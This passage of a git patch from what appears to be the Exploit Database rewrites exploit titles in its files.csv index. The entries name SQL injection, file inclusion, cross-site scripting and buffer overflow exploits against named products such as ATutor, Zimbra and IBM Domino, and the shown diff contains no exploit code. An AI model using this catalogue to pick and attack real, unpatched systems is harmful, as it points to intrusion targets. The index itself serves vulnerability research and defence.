From 8330920f324edbc2b5d508ba117659da5c8701c3 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 25 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-25 4 new exploits ATutor 1.5.3.1 - (links) Blind SQL Injection ATutor 1.5.3.1 - 'links' Blind SQL Injection Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow WebPortal CMS 0.6.0 - (index.php m) SQL Injection WebPortal CMS 0.6.0 - 'index.php' SQL Injection samPHPweb - 'db.php commonpath' Remote File Inclusion samPHPweb 4.2.2 - 'db.php' Remote File Inclusion samPHPweb - 'songinfo.php' SQL Injection samPHPweb 4.2.2 - 'songinfo.php' SQL Injection ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion The Matt Wright Guestbook.pl 2.3.1 - Server Side Include The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include html2ps - 'include file' Server Side Include Directive Directory Traversal html2ps - 'include file' Server-Side Include Directive Directory Traversal ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting ATutor 
1.4.3 - inbox/index.php view Parameter Cross-Site Scripting ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit) Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit) Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion Weathermap 0.97c - 'mapname' Parameter Local File Inclusion ATutor 1.5.1 - password_reminder.php SQL Injection ATutor 1.5.1 - 'password_reminder.php' SQL Injection ATutor 1.x - forum.inc.php Arbitrary Command Execution ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion ATutor 1.x - print.php section Parameter Remote File Inclusion ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion ATutor 1.x - 'print.php' section Parameter Remote File Inclusion ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting ATutor 1.5.x - password_reminder.php forgot 
Parameter Cross-Site Scripting ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting Zimbra - Privilegie Escalation (via Local File Inclusion) Zimbra 2009-2013 - Local File Inclusion Zimbra Collaboration Server - Local File Inclusion (Metasploit) Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit) Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion Cart Engine 3.0.0 - (task.php) Local File Inclusion Cart Engine 3.0.0 - 'task.php' Local File Inclusion Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion Kemana Directory 1.5.6 - 'task.php' Local File Inclusion Railo - Remote File Inclusion (Metasploit) Railo 4.2.1 - Remote File Inclusion (Metasploit) LittleSite 0.1 - 'file' Parameter Local File Inclusion LittleSite 0.1 - 'index.php' Local File Inclusion OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion OSClass 3.4.1 - 'index.php' Local File Inclusion Magento Server MAGMI Plugin - Remote File Inclusion Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection) Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) u5CMS 3.9.3 - (thumb.php) Local File Inclusion u5CMS 3.9.3 - 'thumb.php' Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion ATutor - 'tool_file' Parameter 
Local File Inclusion openSIS 5.1 - 'ajax.php' Local File Inclusion ATutor 2.1 - 'tool_file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion Fork CMS - 'js.php' Local File Inclusion HP Insight Diagnostics - Local File Inclusion HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion phpVibe - Information Disclosure / Remote File Inclusion phpVibe 3.1 - Information Disclosure / Remote File Inclusion CakePHP - AssetDispatcher Class Local File Inclusion CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion TomatoCart - 'install/rpc.php' Local File Inclusion TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion NeoBill - /install/index.php language Parameter Traversal Local File Inclusion NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion iScripts AutoHoster - 'fname' Parameter Local File Inclusion iScripts AutoHoster - 'id' Parameter Local File Inclusion AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion AFCommerce - 'adblock.php' Remote File Inclusion AFCommerce - 'adminpassword.php' Remote File Inclusion AFCommerce - 'controlheader.php' Remote File Inclusion xBoard - 'post' Parameter Local File Inclusion xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion Rips Scanner 0.5 - (code.php) Local File 
Inclusion Rips Scanner 0.5 - 'code.php' Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion qEngine - 'run' Parameter Local File Inclusion qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery CMSimple - Remote file Inclusion CMSimple 4.4.4 - Remote file Inclusion VoipSwitch - 'action' Parameter Local File Inclusion VoipSwitch - 'user.php' Local File Inclusion Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062) EC-CUBE 2.12.6 - Server-Side Request Forgery Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management --- files.csv | 148 ++++---- platforms/hardware/webapps/40626.txt | 28 ++ platforms/hardware/webapps/40629.txt | 38 ++ platforms/php/webapps/40628.pl | 89 +++++ platforms/windows/local/40627.c | 538 +++++++++++++++++++++++++++ 5 files changed, 769 insertions(+), 72 deletions(-) create mode 100755 platforms/hardware/webapps/40626.txt create mode 100755 platforms/hardware/webapps/40629.txt create mode 100755 platforms/php/webapps/40628.pl 
create mode 100755 platforms/windows/local/40627.c
diff --git a/files.csv b/files.csv
index d3c5d8ad0..18c5a244c 100755
--- a/files.csv
+++ b/files.csv
@@ -1789,7 +1789,7 @@ id,file,description,date,author,platform,type,port
 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0
 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0
 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0
-2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Blind SQL Injection",2006-07-30,rgod,php,webapps,0
+2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0
 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0
 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0
 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0
@@ -4461,13 +4461,13 @@ id,file,description,date,author,platform,type,port
 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0
 4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0
 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
-4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
+4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
 4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0
 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0
 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0
 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0
 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0
-4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
+4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
 4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0
 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0
 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0
@@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port
 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0
 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0
 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0
-4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection",2007-12-31,x0kster,php,webapps,0
+4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0
 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0
 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0
 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0
@@ -4483,9 +4483,9 @@ id,file,description,date,author,platform,type,port
 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0
 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0
 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote / Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0
-4834,platforms/php/webapps/4834.txt,"samPHPweb - 'db.php commonpath' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0
+4834,platforms/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0
 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0
-4836,platforms/php/webapps/4836.txt,"samPHPweb - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0
+4836,platforms/php/webapps/4836.txt,"samPHPweb 4.2.2 - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0
 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0
 4838,platforms/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0
 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0
@@ -5773,7 +5773,7 @@ id,file,description,date,author,platform,type,port
 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0
 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0
-6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0
+6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0
 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0
 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0
 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0
@@ -9294,7 +9294,7 @@ id,file,description,date,author,platform,type,port
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
-9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0
+9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0
 9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0
 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0
 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0
@@ -9389,7 +9389,7 @@ id,file,description,date,author,platform,type,port
 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
-10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0
+10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0
 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0
 10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
@@ -19472,7 +19472,7 @@ id,file,description,date,author,platform,type,port
 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0
 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0
 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0
-22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0
+22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0
 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0
 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0
 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0
@@ -21539,7 +21539,7 @@ id,file,description,date,author,platform,type,port
 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0
 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0
 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0
-24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
+24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0
 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0
 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0
 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0
@@ -22069,7 +22069,7 @@ id,file,description,date,author,platform,type,port
 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0
 24868,platforms/php/webapps/24868.rb,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0
 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
-24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0
+24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,php,webapps,0
 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
@@ -22108,7 +22108,7 @@ id,file,description,date,author,platform,type,port
 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos,0
 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0
 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p Parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0
-24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0
+24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0
 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0
 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0
 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0
@@ -23019,15 +23019,15 @@ id,file,description,date,author,platform,type,port
 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0
 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0
 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0
-25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
-25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
+25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0
 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0
 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0
 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0
@@ -23167,7 +23167,7 @@ id,file,description,date,author,platform,type,port
 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
 25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
-25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
